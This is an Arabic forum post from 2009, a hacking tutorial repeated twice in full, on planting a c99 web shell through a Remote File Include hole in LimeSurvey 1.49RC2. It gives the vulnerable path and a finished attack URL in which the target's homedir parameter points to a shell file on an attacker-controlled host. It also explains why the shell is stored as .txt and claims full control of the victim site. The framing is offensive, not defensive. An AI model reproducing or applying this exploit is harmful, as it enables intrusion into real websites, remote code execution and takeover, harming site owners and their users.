BLACK.JaGuAr
10-04-2009, 06:43 PM
http://www.samysoft.net/forumim/slambasmla/5464564.gif
كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....
- رفع الشيل عبر ثغرات File Include فايل إنكلود -
اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع
milw0rm (http://www.milw0rm.com)
SecurityReason.com - Our Reason is Security (http://www.securityreason.com)
أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/DiL14999.jpg
كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...
طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
Type : RFI(Remote File Include)
أي ثغره من نوع فايل إنكلود .
2- اسم السكربت المصاب :
****** name : LimeSurvey (PHPSurveyor)
3-الإصدار المصاب وهو :
Version : 1.49RC2
المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]
الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
http://victim.com
والسكربت المصاب والإصدار هو :
LimeSurvey والإصدار 1.49RC2
وهو راكب عليه هكذا :
http://victim.com/ls
إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]
بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
http://mysite.com/black/c99.txt
لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :
http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?
وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
http://mysite.com/black/c99.txt
داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..
وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله
ودمتم سالمين
كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....
- رفع الشيل عبر ثغرات File Include فايل إنكلود -
اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع
milw0rm (http://www.milw0rm.com)
SecurityReason.com - Our Reason is Security (http://www.securityreason.com)
أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :
http://www.aljyyosh.info/upfiles/DiL14999.jpg
كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...
طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
Type : RFI(Remote File Include)
أي ثغره من نوع فايل إنكلود .
2- اسم السكربت المصاب :
****** name : LimeSurvey (PHPSurveyor)
3-الإصدار المصاب وهو :
Version : 1.49RC2
المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]
الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
http://victim.com
والسكربت المصاب والإصدار هو :
LimeSurvey والإصدار 1.49RC2
وهو راكب عليه هكذا :
http://victim.com/ls
إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]
بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
http://mysite.com/black/c99.txt
لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :
http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?
وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
http://mysite.com/black/c99.txt
داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..
وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله
ودمتم سالمين